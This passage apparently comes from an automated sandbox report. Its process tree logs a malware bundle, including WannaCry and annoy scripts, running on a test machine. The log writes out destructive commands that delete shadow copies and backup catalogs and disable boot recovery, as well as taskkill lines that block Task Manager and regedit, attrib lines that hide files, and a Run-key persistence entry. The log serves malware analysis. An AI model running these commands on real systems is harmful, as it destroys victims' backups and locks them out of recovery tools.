                                                                                                            PID:1920
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /f /im taskmgr.exe
                                                                                                            4⤵
                                                                                                            • Kills process with taskkill
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:2712
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /f /im regedit.exe
                                                                                                            4⤵
                                                                                                            • Kills process with taskkill
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:1864
                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                                            4⤵
                                                                                                              PID:1780
                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                                              4⤵
                                                                                                                PID:1364
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /f /im taskmgr.exe
                                                                                                                4⤵
                                                                                                                • Kills process with taskkill
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2784
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /f /im regedit.exe
                                                                                                                4⤵
                                                                                                                • Kills process with taskkill
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1756
                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                                                4⤵
                                                                                                                  PID:3028
                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                                                  4⤵
                                                                                                                    PID:1548
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im taskmgr.exe
                                                                                                                    4⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:2220
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im regedit.exe
                                                                                                                    4⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1340
                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                                                    4⤵
                                                                                                                      PID:1540
                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                                                      4⤵
                                                                                                                        PID:2752
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /f /im taskmgr.exe
                                                                                                                        4⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2636
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /f /im regedit.exe
                                                                                                                        4⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1524
                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                                                        4⤵
                                                                                                                          PID:1692
                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                                                          4⤵
                                                                                                                            PID:1044
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /f /im taskmgr.exe
                                                                                                                            4⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1544
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /f /im regedit.exe
                                                                                                                            4⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:1616
                                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                                                            4⤵
                                                                                                                              PID:2068
                                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                                                              4⤵
                                                                                                                                PID:1392
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /f /im taskmgr.exe
                                                                                                                                4⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2500
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /f /im regedit.exe
                                                                                                                                4⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:340
                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                                                                4⤵
                                                                                                                                  PID:1396
                                                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                                                                  4⤵
                                                                                                                                    PID:764
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /f /im taskmgr.exe
                                                                                                                                    4⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1744
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /f /im regedit.exe
                                                                                                                                    4⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:396
                                                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy2.vbs"
                                                                                                                                    4⤵
                                                                                                                                      PID:2512
                                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\annoy.vbs"
                                                                                                                                      4⤵
                                                                                                                                        PID:1968
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /f /im taskmgr.exe
                                                                                                                                        4⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:2808
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /f /im regedit.exe
                                                                                                                                        4⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:2608
                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                      timeout 5
                                                                                                                                      3⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:1340
                                                                                                                                    • C:\Windows\SysWOW64\shutdown.exe
                                                                                                                                      shutdown /a
                                                                                                                                      3⤵
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1800
                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                      timeout 2
                                                                                                                                      3⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:808
                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\win7recovery.exe
                                                                                                                                      win7recovery.exe
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Adds Run key to start application
                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                      • System policy modification
                                                                                                                                      PID:2712
                                                                                                                                      • C:\ProgramData\WbVhxCIDDK.exe
                                                                                                                                        "C:\ProgramData\WbVhxCIDDK.exe"
                                                                                                                                        4⤵
                                                                                                                                        • Modifies visiblity of hidden/system files in Explorer
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:1896
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          attrib +h "C:\Users\Admin\*.* " /s /d
                                                                                                                                          5⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:2216
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          attrib +h "C:\ProgramData\Microsoft\Windows\Start Menu\*.* " /s /d
                                                                                                                                          5⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:1532
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          attrib +h "C:\*.*" /s /d
                                                                                                                                          5⤵
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:1928
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          attrib +h "F:\*.*" /s /d
                                                                                                                                          5⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:2680
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill /f /im WScript.exe
                                                                                                                                      3⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2832
                                                                                                                                    • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\wannacryptor.exe
                                                                                                                                      wannacryptor.exe
                                                                                                                                      3⤵
                                                                                                                                      • Drops startup file
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Sets desktop wallpaper using registry
                                                                                                                                      PID:2384
                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                        attrib +h .
                                                                                                                                        4⤵
                                                                                                                                        • Views/modifies file attributes
                                                                                                                                        PID:2836
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls . /grant Everyone:F /T /C /Q
                                                                                                                                        4⤵
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:1804
                                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\taskdl.exe
                                                                                                                                        taskdl.exe
                                                                                                                                        4⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:868
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /c 323671721043228.bat
                                                                                                                                        4⤵
                                                                                                                                          PID:1780
                                                                                                                                          • C:\Windows\SysWOW64\cscript.exe
                                                                                                                                            cscript.exe //nologo m.vbs
                                                                                                                                            5⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:2544
                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                          attrib +h +s F:\$RECYCLE
                                                                                                                                          4⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:1612
                                                                                                                                        • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\@[email protected]
                                                                                                                                          @[email protected] co
                                                                                                                                          4⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:2504
                                                                                                                                          • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\TaskData\Tor\taskhsvc.exe
                                                                                                                                            TaskData\Tor\taskhsvc.exe
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:1580
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd.exe /c start /b @[email protected] vs
                                                                                                                                          4⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:1708
                                                                                                                                          • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\@[email protected]
                                                                                                                                            @[email protected] vs
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:2604
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                                                              6⤵
                                                                                                                                                PID:1820
                                                                                                                                                • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                  vssadmin delete shadows /all /quiet
                                                                                                                                                  7⤵
                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                  PID:2684
                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                  wmic shadowcopy delete
                                                                                                                                                  7⤵
                                                                                                                                                    PID:340
                                                                                                                                            • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\@[email protected]
                                                                                                                                              @[email protected]
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Sets desktop wallpaper using registry
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:2016
                                                                                                                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                "C:\Program Files\Internet Explorer\iexplore.exe" https://www.google.com/search?q=how+to+buy+bitcoin
                                                                                                                                                5⤵
                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:2892
                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2892 CREDAT:275457 /prefetch:2
                                                                                                                                                  6⤵
                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:1716
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 320
                                                                                                                                                5⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Program crash
                                                                                                                                                PID:888
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "manjgrzvtx670" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\tasksche.exe\"" /f
                                                                                                                                              4⤵
                                                                                                                                                PID:1100
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "manjgrzvtx670" /t REG_SZ /d "\"C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\tasksche.exe\"" /f
                                                                                                                                                  5⤵
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  • Modifies registry key
                                                                                                                                                  PID:544
                                                                                                                                              • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\@[email protected]
                                                                                                                                                @[email protected]
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:1572
                                                                                                                                              • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\@[email protected]
                                                                                                                                                @[email protected]
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Sets desktop wallpaper using registry
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:2668
                                                                                                                                              • C:\Users\Admin\Desktop\yfga_game_95b56e3e-e019-476c-b4e8-de83322602d7\@[email protected]
                                                                                                                                                @[email protected]
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:1684
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout 12
                                                                                                                                              3⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:448
                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-574643198-130135805516000277321079108666679549138-2037775681107688901959674416"
                                                                                                                                          1⤵
                                                                                                                                            PID:2544
                                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:1568
                                                                                                                                            • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                              1⤵
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                              • Modifies registry class
                                                                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:1908
                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                "C:\Windows\explorer.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                • Boot or Logon Autostart Execution: Active Setup
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Modifies registry class
                                                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:1216
                                                                                                                                                • C:\Windows\regedit.exe
                                                                                                                                                  "C:\Windows\regedit.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Runs regedit.exe
                                                                                                                                                  PID:2424
                                                                                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                                                                                  "C:\Windows\system32\taskmgr.exe"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2552
                                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                                    "C:\Windows\system32\taskmgr.exe"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1800
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1084
                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                          taskkill /f /im screenscrew.exe
                                                                                                                                                          4⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:1376
                                                                                                                                                  • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                    C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2800
                                                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x150
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2904
                                                                                                                                                      • C:\Windows\system32\LogonUI.exe
                                                                                                                                                        "LogonUI.exe" /flags:0x0
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1612
                                                                                                                                                        • C:\Windows\system32\csrss.exe
                                                                                                                                                          %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1336
                                                                                                                                                          • C:\Windows\system32\winlogon.exe
                                                                                                                                                            winlogon.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1972
                                                                                                                                                              • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                "LogonUI.exe" /flags:0x0
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2152
                                                                                                                                                                • C:\Windows\system32\userinit.exe
                                                                                                                                                                  C:\Windows\system32\userinit.exe
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2280
                                                                                                                                                                    • C:\Windows\Explorer.EXE
                                                                                                                                                                      C:\Windows\Explorer.EXE
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2336
                                                                                                                                                                        • C:\Windows\System32\regsvr32.exe
                                                                                                                                                                          "C:\Windows\System32\regsvr32.exe" /s /n /i:/UserInstall C:\Windows\system32\themeui.dll
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1660
                                                                                                                                                                          • C:\Program Files (x86)\Windows Mail\WinMail.exe
                                                                                                                                                                            "C:\Program Files (x86)\Windows Mail\WinMail.exe" OCInstallUserConfigOE
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1788
                                                                                                                                                                              • C:\Program Files\Windows Mail\WinMail.exe
                                                                                                                                                                                "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:1864
                                                                                                                                                                              • C:\Windows\System32\unregmp2.exe
                                                                                                                                                                                "C:\Windows\System32\unregmp2.exe" /FirstLogon /Shortcuts /RegBrowsers /ResetMUI
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:1364
                                                                                                                                                                                • C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                  "C:\Windows\System32\regsvr32.exe" /s /n /i:U shell32.dll
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:348
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    "C:\Windows\SysWOW64\rundll32.exe" C:\Windows\SysWOW64\mscories.dll,Install
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1332
                                                                                                                                                                                    • C:\Windows\System32\ie4uinit.exe
                                                                                                                                                                                      "C:\Windows\System32\ie4uinit.exe" -UserConfig
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:924
                                                                                                                                                                                        • C:\Windows\System32\ie4uinit.exe
                                                                                                                                                                                          C:\Windows\System32\ie4uinit.exe -ClearIconCache
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:1100
                                                                                                                                                                                          • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                            C:\Windows\System32\rundll32 advpack.dll,LaunchINFSectionEx C:\Windows\system32\ieuinit.inf,Install,,36
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:1116
                                                                                                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                              C:\Windows\System32\rundll32 C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:1096
                                                                                                                                                                                                • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                  C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:1184
                                                                                                                                                                                              • C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                "C:\Windows\System32\regsvr32.exe" /s /n /i:/UserInstall C:\Windows\system32\themeui.dll
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:308
                                                                                                                                                                                                • C:\Program Files\Windows Mail\WinMail.exe
                                                                                                                                                                                                  "C:\Program Files\Windows Mail\WinMail.exe" OCInstallUserConfigOE
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:888
                                                                                                                                                                                                  • C:\Windows\System32\unregmp2.exe
                                                                                                                                                                                                    "C:\Windows\System32\unregmp2.exe" /FirstLogon /Shortcuts /RegBrowsers /ResetMUI
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:1372
                                                                                                                                                                                                    • C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                      "C:\Windows\System32\regsvr32.exe" /s /n /i:U shell32.dll
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:2520
                                                                                                                                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" C:\Windows\system32\mscories.dll,Install
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:2756
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:1688
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\GO BACK!\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x15c,0x160,0x164,0x130,0x168,0x13fc57688,0x13fc57698,0x13fc576a8
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:2264
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" --system-level --verbose-logging --installerdata="C:\Program Files\Google\Chrome\Application\master_preferences" --create-shortcuts=1 --install-level=0
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:1540
                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe
                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\GO BACK!\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x15c,0x160,0x164,0x130,0x168,0x13fc57688,0x13fc57698,0x13fc576a8
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                      PID:2796
                                                                                                                                                                                                                • C:\Windows\System32\zcgahj.exe
                                                                                                                                                                                                                  "C:\Windows\System32\zcgahj.exe"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:1780
                                                                                                                                                                                                                  • C:\Program Files\Windows Sidebar\sidebar.exe
                                                                                                                                                                                                                    "C:\Program Files\Windows Sidebar\sidebar.exe" /autoRun
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:1632
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\runonce.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\runonce.exe /Run6432
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:2780
                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:2680
                                                                                                                                                                                                                        • C:\Windows\System32\mctadmin.exe
                                                                                                                                                                                                                          "C:\Windows\System32\mctadmin.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:1556
                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                            "C:\Windows\explorer.exe"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:1116
                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft Office\Office14\Groove.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft Office\Office14\Groove.exe" /TrayOnly /NoLogon
                                                                                                                                                                                                                              4⤵
